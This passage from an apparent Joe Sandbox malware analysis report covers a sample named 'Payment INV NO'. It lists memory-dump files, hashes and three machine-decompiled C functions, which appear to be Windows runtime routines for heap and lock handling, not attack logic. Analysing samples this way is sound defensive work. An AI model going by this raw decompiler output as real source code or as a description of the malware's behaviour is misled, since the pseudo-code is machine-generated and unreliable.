                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a35fab04dde2af80e3104944f4d273b575735c9c777b7314c6789dac6b115e62
                                                          • Instruction ID: 284be0fbaa3a9ce93bd251640b27926573c4e42975c9829da0430057347f12cd
                                                          • Opcode Fuzzy Hash: a35fab04dde2af80e3104944f4d273b575735c9c777b7314c6789dac6b115e62
                                                          • Instruction Fuzzy Hash: A351DD71109342ABD722EF28C844B2BFBE5FF94710F14096EF59587692E774E848CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017A31C1 Relevance: .2, Instructions: 159COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E017A31C1(char __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v5;
				char _v6;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v28;
				signed char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _t58;
				intOrPtr* _t59;
				signed char _t86;
				signed short _t89;
				void* _t90;
				void* _t94;
				signed int _t96;
				void* _t107;
				char _t109;

				_v6 = __ecx;
				_v12 = 0;
				_t109 = 0;
				_v36 = 0;
				_t107 = __edx;
				_v32 = 0;
				_v44 = 0;
				_v40 = 0;
				_v28 = 0;
				_v24 = 0;
				if(_a4 == 0) {
					L25:
					_t58 = 0xc000000d;
				} else {
					_t59 = _a8;
					if(_t59 == 0 ||  *_t59 == 0 || __edx == 0) {
						goto L25;
					} else {
						_t86 = E017B4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x1fe);
						if(_t86 == 0) {
							_t58 = 0xc0000017;
						} else {
							_t12 = _t86 + 0xaa; // 0xaa
							_v44 = 0xaa0000;
							_v40 = _t12;
							if(E017A49B0( &_v16, _t107) < 0 || E017A3B30(_v16 & 0x0000ffff,  &_v44) == 0) {
								_t109 = 0xc0000001;
							} else {
								_t70 = _a4;
								_t89 = 0;
								_v20 = _v20 & 0;
								if(0 <  *(_a4 + 4)) {
									_v16 = 0;
									while(1) {
										_v32 = _t86;
										_v36 = 0xaa0000;
										_t90 = _t107;
										_t109 = E017A3133(_t90,  *((intOrPtr*)(_t70 + 0x10)) + _t89,  &_v36);
										if(_t109 < 0) {
											goto L19;
										}
										_push(_t90);
										_t109 = E017A40BE(_a8, _t107, 0,  &_v12, _v32);
										if(_t109 >= 0) {
											if(_v6 == 0) {
												if(E017DE490(_v32, _v40) == 0) {
													goto L12;
												} else {
													goto L18;
												}
												L26:
											} else {
												L12:
												_t32 = _t86 + 0x154; // 0x154
												_v24 = _t32;
												_t94 = _t107;
												_v5 = 0;
												_v28 = 0xaa0000;
												_t109 = E017A338B(_t94, _v32,  &_v28,  &_v5);
												if(_t109 >= 0) {
													while(_v28 > 0 && _v5 == 0) {
														_push(_t94);
														_t109 = E017A40BE(_a8, _t107, 0,  &_v12, _v24);
														if(_t109 >= 0) {
															_t94 = _t107;
															_t109 = E017A338B(_t94, _v24,  &_v28,  &_v5);
															if(_t109 >= 0) {
																continue;
															} else {
																break;
															}
														}
														goto L19;
													}
													if(_t109 >= 0) {
														L18:
														_v16 = _v16 + 6;
														_t96 = _v20 + 1;
														_v20 = _t96;
														_t70 = _a4;
														_t89 = _v16;
														if(_t96 < ( *(_a4 + 4) & 0x0000ffff)) {
															continue;
														}
													}
												}
											}
										}
										goto L19;
									}
								}
							}
							L19:
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t86);
							_t58 = _t109;
						}
					}
				}
				return _t58;
				goto L26;
			}























                                                          0x017a31cd
                                                          0x017a31d2
                                                          0x017a31d6
                                                          0x017a31d8
                                                          0x017a31dc
                                                          0x017a31de
                                                          0x017a31e1
                                                          0x017a31e4
                                                          0x017a31e7
                                                          0x017a31ea
                                                          0x017a31f0
                                                          0x017f7d6b
                                                          0x017f7d6b
                                                          0x017a31f6
                                                          0x017a31f6
                                                          0x017a31fb
                                                          0x00000000
                                                          0x017a3211
                                                          0x017a3226
                                                          0x017a322a
                                                          0x017f7d57
                                                          0x017a3230
                                                          0x017a3230
                                                          0x017a3236
                                                          0x017a323d
                                                          0x017a324c
                                                          0x017f7d61
                                                          0x017a3268
                                                          0x017a3268
                                                          0x017a326b
                                                          0x017a326d
                                                          0x017a3274
                                                          0x017a327a
                                                          0x017a327d
                                                          0x017a3280
                                                          0x017a3289
                                                          0x017a3290
                                                          0x017a3297
                                                          0x017a329b
                                                          0x00000000
                                                          0x00000000
                                                          0x017a32a1
                                                          0x017a32b5
                                                          0x017a32b9
                                                          0x017a32c3
                                                          0x017a3383
                                                          0x00000000
                                                          0x017a3389
                                                          0x00000000
                                                          0x017a3389
                                                          0x00000000
                                                          0x017a32c9
                                                          0x017a32c9
                                                          0x017a32cc
                                                          0x017a32d2
                                                          0x017a32d5
                                                          0x017a32da
                                                          0x017a32e2
                                                          0x017a32ef
                                                          0x017a32f3
                                                          0x017a32f5
                                                          0x017a3302
                                                          0x017a3316
                                                          0x017a331a
                                                          0x017a3326
                                                          0x017a332e
                                                          0x017a3332
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017a3332
                                                          0x00000000
                                                          0x017a331a
                                                          0x017a3336
                                                          0x017a3338
                                                          0x017a333e
                                                          0x017a3342
                                                          0x017a3343
                                                          0x017a334c
                                                          0x017a334f
                                                          0x017a3352
                                                          0x00000000
                                                          0x00000000
                                                          0x017a3352
                                                          0x017a3336
                                                          0x017a32f3
                                                          0x017a32c3
                                                          0x00000000
                                                          0x017a32b9
                                                          0x017a327d
                                                          0x017a3274
                                                          0x017a3358
                                                          0x017a3364
                                                          0x017a3369
                                                          0x017a3369
                                                          0x017a322a
                                                          0x017a31fb
                                                          0x017a3371
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 257e04130d4af536a99480556c85bbfcb20c6af6b5dd85e145954f49b389b330
                                                          • Instruction ID: db5a6cc48013c23aded029f645bd2290c885f9a9a1a57d0120e277b251652d21
                                                          • Opcode Fuzzy Hash: 257e04130d4af536a99480556c85bbfcb20c6af6b5dd85e145954f49b389b330
                                                          • Instruction Fuzzy Hash: DE518271E0460AAFDF15CF98C840BEEFBB5BF84710F54426AEA05AB340DB749945CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C3C3E Relevance: .2, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E017C3C3E(void* __ecx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v44;
				void* _v52;
				void* __ebx;
				signed char _t59;
				intOrPtr _t65;
				signed int _t67;
				void* _t75;
				signed char* _t78;
				intOrPtr _t79;
				signed int _t91;
				signed int _t104;
				void* _t127;
				signed int _t134;
				void* _t136;

				_t136 = (_t134 & 0xfffffff8) - 0x14;
				_t127 = __ecx;
				_v20 = 0;
				E017C4E70(0x18886d0, 0x17c5330, 0, 0);
				if(E017C3FCD( &_v24) < 0 ||  *((intOrPtr*)(_t136 + 0x1c)) > 0xa) {
					_t59 = _v20;
				} else {
					_t59 = 3;
					_v20 = _t59;
				}
				_v20 = E017C3F33(_t127, _t59);
				_v28 = 0;
				_push(E017C0678(_t127, 1));
				_push(0x2000);
				_push( &_v20);
				_push(0);
				_push( &_v28);
				_push(0xffffffff);
				if(E017D9660() < 0) {
					L16:
					_t65 = 0;
					goto L13;
				} else {
					if((_v20 & 0x00000001) != 0) {
						_t67 = 1;
					} else {
						_t67 =  *0x1886240; // 0x4
					}
					_t104 = _t67 * 0x18;
					_t12 = _t104 + 0x7d0; // 0x7d1
					 *((intOrPtr*)(_t136 + 0x18)) = _t12;
					_push(E017C0678(_t127, 1));
					_push(0x1000);
					_push(_t136 + 0x20);
					_push(0);
					_push( &_v24);
					_push(0xffffffff);
					if(E017D9660() < 0) {
						 *((intOrPtr*)(_t136 + 0x18)) = 0;
						E017C174B( &_v24, _t136 + 0x18, 0x8000);
						goto L16;
					} else {
						_t75 = E017B7D50();
						_t132 = 0x7ffe0380;
						if(_t75 != 0) {
							_t78 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						} else {
							_t78 = 0x7ffe0380;
						}
						if( *_t78 != 0) {
							_t79 =  *[fs:0x30];
							__eflags =  *(_t79 + 0x240) & 0x00000001;
							if(( *(_t79 + 0x240) & 0x00000001) == 0) {
								goto L10;
							}
							__eflags = E017B7D50();
							if(__eflags != 0) {
								_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							}
							L01851582(_t104, _t127, _v24, __eflags,  *((intOrPtr*)(_t136 + 0x20)),  *(_t127 + 0x74) << 3,  *_t132 & 0x000000ff);
							L0185138A(_t104, _t127, _v36, _v24, 9);
							goto L10;
						} else {
							L10:
							E017C3EA8(_t127, _v24, _v20);
							 *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1e4)) =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1e4)) + _v20;
							 *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1e8)) =  *((intOrPtr*)( *((intOrPtr*)(_v28 + 0xc)) + 0x1e8)) +  *((intOrPtr*)(_t136 + 0x18));
							 *((intOrPtr*)(_v28 + 0x18)) = _v20 + _v28;
							 *((intOrPtr*)(_v28 + 0x14)) =  *((intOrPtr*)(_t136 + 0x18)) + _v28;
							_t35 = _v28 + 0x7d0; // 0x7d0
							 *((intOrPtr*)(_v28 + 0x10)) = _t35 + _t104;
							_t91 =  *0x18884b4; // 0x0
							if((_t91 & 0x00000003) == 0) {
								 *0x18884b4 = _t91 | 0x00000001;
								E017C1129();
							}
							 *(_v24 + 0x1b8) = _v20;
							_t65 = _v24;
							L13:
							return _t65;
						}
					}
				}
			}























                                                          0x017c3c46
                                                          0x017c3c4e
                                                          0x017c3c5c
                                                          0x017c3c60
                                                          0x017c3c70
                                                          0x017c3c7d
                                                          0x018062a2
                                                          0x018062a4
                                                          0x018062a5
                                                          0x018062a5
                                                          0x017c3c8b
                                                          0x017c3c90
                                                          0x017c3c99
                                                          0x017c3c9a
                                                          0x017c3ca3
                                                          0x017c3ca4
                                                          0x017c3ca9
                                                          0x017c3caa
                                                          0x017c3cb3
                                                          0x018062c5
                                                          0x018062c5
                                                          0x00000000
                                                          0x017c3cb9
                                                          0x017c3cbe
                                                          0x018062ce
                                                          0x017c3cc4
                                                          0x017c3cc4
                                                          0x017c3cc4
                                                          0x017c3cc9
                                                          0x017c3cd1
                                                          0x017c3cd7
                                                          0x017c3ce0
                                                          0x017c3ce1
                                                          0x017c3cea
                                                          0x017c3ceb
                                                          0x017c3cf0
                                                          0x017c3cf1
                                                          0x017c3cfa
                                                          0x018062b7
                                                          0x018062c0
                                                          0x00000000
                                                          0x017c3d00
                                                          0x017c3d00
                                                          0x017c3d05
                                                          0x017c3d0c
                                                          0x018062dd
                                                          0x017c3d12
                                                          0x017c3d12
                                                          0x017c3d12
                                                          0x017c3d17
                                                          0x018062e7
                                                          0x018062ed
                                                          0x018062f4
                                                          0x00000000
                                                          0x00000000
                                                          0x018062ff
                                                          0x01806301
                                                          0x0180630c
                                                          0x0180630c
                                                          0x0180630c
                                                          0x01806327
                                                          0x01806338
                                                          0x00000000
                                                          0x017c3d1d
                                                          0x017c3d1d
                                                          0x017c3d27
                                                          0x017c3d37
                                                          0x017c3d48
                                                          0x017c3d58
                                                          0x017c3d65
                                                          0x017c3d6c
                                                          0x017c3d74
                                                          0x017c3d77
                                                          0x017c3d7e
                                                          0x017c3d83
                                                          0x017c3d88
                                                          0x017c3d88
                                                          0x017c3d95
                                                          0x017c3d9b
                                                          0x017c3d9f
                                                          0x017c3da5
                                                          0x017c3da5
                                                          0x017c3d17
                                                          0x017c3cfa

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 47d4af38b1f64b103bfc6fa97baf228ff46049067ba6d31ed4ec7c98ef6a20a2
                                                          • Instruction ID: 31e8d2ea6b303e45c9e0ce5c10a865a15ba1ae25481768ae9780b9fa56e1166f
                                                          • Opcode Fuzzy Hash: 47d4af38b1f64b103bfc6fa97baf228ff46049067ba6d31ed4ec7c98ef6a20a2
                                                          • Instruction Fuzzy Hash: 75518171608341AFD751DF29C884A6AF7E8FF84714F14896DF899C7281D770DA05CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017AEF40 Relevance: .1, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E017AEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E01799080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t87 =  *(_t90 + 4);
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t74 = _t87 - 2;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t74 = _t87 - 4;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E01792D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t85 = ( *(_t90 + 0x14) ^ _t74) & 0x00ffffff ^  *(_t90 + 0x14);
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                          0x017aef4b
                                                          0x017aef4d
                                                          0x017aef57
                                                          0x017af0bd
                                                          0x017af0c2
                                                          0x017af0d2
                                                          0x017af0d2
                                                          0x017af0c2
                                                          0x017aef5d
                                                          0x017aef5f
                                                          0x017aef67
                                                          0x017aef6a
                                                          0x017aef6d
                                                          0x017aef74
                                                          0x017aef7f
                                                          0x017aef82
                                                          0x017aef82
                                                          0x017aef86
                                                          0x017aef88
                                                          0x017aef8c
                                                          0x017aef8f
                                                          0x017aef8f
                                                          0x017aef8f
                                                          0x00000000
                                                          0x017aef91
                                                          0x017aef93
                                                          0x017aefc4
                                                          0x017aefc4
                                                          0x017aefca
                                                          0x017aefd0
                                                          0x017af0a6
                                                          0x00000000
                                                          0x00000000
                                                          0x017af0af
                                                          0x017fbb06
                                                          0x017fbb0a
                                                          0x017af0b5
                                                          0x017af0b5
                                                          0x017af0b5
                                                          0x00000000
                                                          0x017aefd6
                                                          0x017aefd9
                                                          0x017af0de
                                                          0x017af0e2
                                                          0x017aefdf
                                                          0x017aefdf
                                                          0x017aefe5
                                                          0x017fbafc
                                                          0x017fbafc
                                                          0x017aefe5
                                                          0x017aefeb
                                                          0x017aefed
                                                          0x017af00f
                                                          0x017af011
                                                          0x017af01a
                                                          0x017af01d
                                                          0x017af021
                                                          0x017af028
                                                          0x017af029
                                                          0x017af029
                                                          0x017af02c
                                                          0x00000000
                                                          0x017af02c
                                                          0x017aeff3
                                                          0x017aeff9
                                                          0x017af0ea
                                                          0x017af0ed
                                                          0x017af0ef
                                                          0x00000000
                                                          0x017af0ef
                                                          0x017af003
                                                          0x017fbb12
                                                          0x017af045
                                                          0x017af049
                                                          0x017af051
                                                          0x017af09e
                                                          0x017af0a0
                                                          0x017af0a0
                                                          0x017af09e
                                                          0x017af064
                                                          0x017af06b
                                                          0x017fbb1a
                                                          0x017fbb1a
                                                          0x017af071
                                                          0x017af071
                                                          0x017af07d
                                                          0x017af082
                                                          0x017af08f
                                                          0x017af08f
                                                          0x017af009
                                                          0x017af00d
                                                          0x00000000
                                                          0x017af00d
                                                          0x017aefd0
                                                          0x017aef97
                                                          0x017aefa5
                                                          0x017aefaa
                                                          0x00000000
                                                          0x017aefac
                                                          0x017aefac
                                                          0x017aefac
                                                          0x00000000
                                                          0x017aefb2
                                                          0x017af036
                                                          0x017af03a
                                                          0x017af040
                                                          0x017af090
                                                          0x00000000
                                                          0x017af092
                                                          0x017af042
                                                          0x00000000
                                                          0x017af042
                                                          0x017aefb7
                                                          0x017aefb9
                                                          0x017aefbc
                                                          0x017aefb0
                                                          0x017aefb0
                                                          0x00000000
                                                          0x017aefbe
                                                          0x017aefbe
                                                          0x017aefc1
                                                          0x00000000
                                                          0x017aefc1
                                                          0x017aefbc
                                                          0x017aefaa
                                                          0x017aef91

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
